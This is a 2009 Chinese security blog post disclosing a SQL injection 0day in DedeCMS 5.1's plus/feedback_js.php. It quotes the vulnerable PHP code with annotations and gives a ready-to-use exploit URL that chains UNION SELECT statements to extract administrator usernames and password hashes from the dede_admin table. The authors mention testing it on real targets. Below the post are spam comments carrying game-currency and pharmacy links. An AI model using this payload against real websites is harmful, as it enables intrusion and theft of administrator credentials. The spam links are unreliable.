RSS

DEDECMS 5.1 feedback_js.php 0DAY

This entry was posted on Oct 11 2009

作者:st0p Rainy'Fox
转载请注明出处:http://www.st0p.org http://bbs.erpangzi.com/

这个漏洞是我和Rainy'Fox一起发现的
同样是在magic_quotes_gpc=off的情况下可用

漏洞版本:DEDECMS 5.1
此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

......
$urlindex = 0;
if(empty($arcID))
{
	$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
       //此处$arcurl没有过滤
	if(is_array($row)) $urlindex = $row['id'];
      //存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了
}
if(empty($arcID) && empty($urlindex)) exit();
//如果$arcID为空或$urlindex为空则退出
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
//我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了.
else $wq = " aid='$arcID' ";
 $querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
......

看一下利用方法吧,嘿,为了闭合我用了两次union

1

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2  and ''='" from dede_admin where ''='

dedecms-5-1-feedback_js-php-0day

唉,偶和Rainy'Fox这家伙找目标测试的时候,他竟然说能不能在magic_quotes_gpc=on时通过....这种想法太YD了..也太可怕了,要真可以实现,这个网络界又该乱了,好多程序都是在PHP默认magic_quotes_gpc为关闭时才会调用自身的转义部分...要真能实现,那就是PHP程序的恶梦了...

, , , ,
学·武功秘籍
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


9 Responses to “DEDECMS 5.1 feedback_js.php 0DAY”

  1. By хостинг on Nov 19, 2009 | Reply

    zelo intiresno, hvala


  2. By AKfour seven on Dec 1, 2009 | Reply

    I stand here today humbled by the task before [url=http://www.bawwgt.com]dofus kamas[/url], grateful for the trust you have bestowed, mindful of the sacrifices borne by our [url=http://www.bawwgt.com]cheap dofus kamas[/url]. I thank President [url=http://www.bawwgt.com]dofus power leveling[/url] for his service to [url=http://www.bawwgt.com]buy dofus kamas[/url], as well as the generosity and cooperation he has shown throughout this transition.


  3. By wsewtoexg on Dec 3, 2009 | Reply

    CMvNTO honoyhhectcq, [url=http://bqjmruocdqwf.com/]bqjmruocdqwf[/url], [link=http://mdbdixbzaeau.com/]mdbdixbzaeau[/link], http://njofsuttytxm.com/


  4. By tedy on Dec 5, 2009 | Reply

    Only 34 days before DOFUS 2.0! December 2nd will be here before we know [url=http://www.bawwgt.com/fr]dofus kamas[/url]. On [url=http://www.bawwgt.com/fr]dofus kamas moins chers[/url] every player will discover a completely new DOFUS experience. [url=http://www.bawwgt.com/fr]acheter des dofus kamas[/url] have to be content with the reports and forums. Even so [url=http://www.bawwgt.com/fr]achat dofus kamas[/url], there¡¯s always a few of our dear players in the forums.


  5. By buy strattera on Dec 13, 2009 | Reply

    this is a cool news. Thank you.


  6. By Seengart on Dec 14, 2009 | Reply

    huh... informative style..


  7. By Natasha-web on Dec 16, 2009 | Reply

    Vdaka za zaujimavy blog


  1. 2 Trackback(s)

  2. Oct 28, 2009: DEDECMS 5.1 feedback_js.php 0DAY | 鬼仔's Blog
  3. Oct 29, 2009: 合利工作室 » DEDECMS 5.1 feedback_js.php 0DAY

You must be logged in to post a comment.